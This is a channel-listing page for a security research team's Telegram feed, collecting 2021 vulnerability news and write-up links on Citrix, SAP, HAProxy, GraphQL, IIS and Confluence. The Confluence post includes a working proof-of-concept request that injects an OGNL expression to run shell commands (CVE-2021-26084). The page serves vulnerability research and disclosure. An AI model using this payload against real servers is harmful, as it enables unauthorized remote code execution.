Channel address:
Categories:
Technologies
Language: English
Subscribers:
2.98K
Description from channel
Positive Technologies Offensive Team: twitter.com/ptswarm
This is the channel where we share articles/vulnerabilities/scripts/etc, not necessarily authored by us, that we find interesting
Ratings & Reviews
Reviews can be left only by registered users. All reviews are moderated by admins.
5 stars
0
4 stars
0
3 stars
0
2 stars
1
1 stars
2
The latest Messages 8
2021-09-22 19:13:23
We are thrilled to announce the following presentations at @hardwear_io, @blackhatevents, #POC2021 and @hackinparis
573 viewsedited 16:13
2021-09-21 15:37:16
RCE in Citrix ShareFile Storage Zones Controller (CVE-2021-22941) – A Walk-Through
by Markus Wulftange
The vulnerability is triggerable when processing user upload requests, which can lead to Unauthorized RCE.
Contents:
• Background
• The Travelogue
• Finding A Path From Sink To Source
• Are We Still on Track?
• What's in the backpack?
• Running With Razor
• Timeline and fix
https://codewhitesec.blogspot.com/2021/09/citrix-sharefile-rce-cve-2021-22941.html
541 viewsedited 12:37
2021-09-15 17:21:53
SAP fixed Post-Auth RCE (CVE-2021-38163) in SAP NetWeaver found by our researcher Mikhail Klyuchnikov.
CVSS 9.9
No credits from SAP again.
Advisory: https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=585106405
516 viewsedited 14:21
2021-09-14 18:46:58
PAX Technology fixed three vulnerabilities discovered by our researcher Artem Ivachev.
When chained together these vulnerabilities allow the interception of user card data and the sending of arbitrary data to the processing of the acquiring bank.
608 views15:46
2021-09-10 10:10:48
The complete GraphQL Security Guide: Fixing the 13 most common GraphQL Vulnerabilities to make your API production ready
by @jensneuse_de
The complete GraphQL security guide. 'Nuff said.
Contents:
• The 13 most common GraphQL Vulnerabilities
• Solving the 13 most common GraphQL Vulnerabilities for private APIs
• Solving the 13 most common GraphQL Vulnerabilities for public APIs
https://wundergraph.com/blog/the_complete_graphql_security_guide_fixing_the_13_most_common_graphql_vulnerabilities_to_make_your_api_production_ready
702 views07:10
2021-09-09 09:20:46
Critical Vulnerability in HAProxy (CVE-2021-40346): Integer Overflow Enables HTTP Smuggling by Ori Hollander
and Or Peles
The vulnerability, CVE-2021-40346, is an Integer Overflow, triggerable via the Content-Length HTTP header, that makes it possible to conduct HTTP Request Smuggling attacks.
Contents:
• Technical Background
• HTTP Request Smuggling
• HAProxy’s HTTP request processing phases (simplified)
• Attack Scenario – Bypassing http-request ACLs
• What happens inside HAProxy
• Getting the HTTP response for the smuggled request
• Attack demonstration – ACL bypass
• Vulnerability Details
• Automating the Discovery
• Fixes and Workarounds
https://jfrog.com/blog/critical-vulnerability-in-haproxy-cve-2021-40346-integer-overflow-enables-http-smuggling/
742 views06:20
2021-09-08 17:59:43
RCE on a backend IIS server via file upload with an atypical file extension.
More community curated payloads can be found at https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Upload%20Insecure%20Files/Extension%20ASP
1.8K views14:59
2021-09-01 17:28:22
SAP refused to disclose which CVEs were assigned to vulnerabilities reported by our researcher Mikhail Klyuchnikov, if any.
Three subsequent letters remain unanswered.
We believe the CVEs to be CVE-2021-33690 (CVSS 9.9) and CVE-2021-33691 (CVSS 6.9) in the August hotfix.
Join the discussion on Twitter: https://twitter.com/ptswarm/status/1433070547399757824
422 views14:28
2021-09-01 10:01:05
Remote Code Execution on Confluence Servers write-up (CVE-2021-26084)
by rootxharsh
and iamnoooob
Patch diffing the latest Confluence update results in RCE PoC.
PoC:
POST /pages/doenterpagevariables.action HTTP/2
Host: localhost
Content-Length: 301
Content-Type: application/x-www-form-urlencoded
queryString=aaa\u0027%2b#{\u0022\u0022[\u0022class\u0022].forName(\u0022javax.script.ScriptEngineManager\u0022).newInstance().getEngineByName(\u0022js\u0022).eval(\u0022var x=new java.lang.ProcessBuilder;x.command([\u0027/bin/bash\u0027,\u0027-c\u0027,\u0027'.$cmd.'\u0027]);x.start()\u0022)}%2b\u0027
Contents:
• Analyzing the hot patch
• Bypassing isSafeExpression
• Bonus - Better Payload
• Bonus - Debugging
https://github.com/httpvoid/writeups/blob/main/Confluence-RCE.md
684 viewsedited 07:01
2021-08-31 14:30:00
Exploiting GraphQL
by @infosec_au
Overview of GraphQL attacks.
Contents:
• Intro
• BatchQL
• Introspection
• Suggestions
• CSRF
• JSON list based batching
• Query name based batching
• Conclusion
https://blog.assetnote.io/2021/08/29/exploiting-graphql/
541 views11:30
P
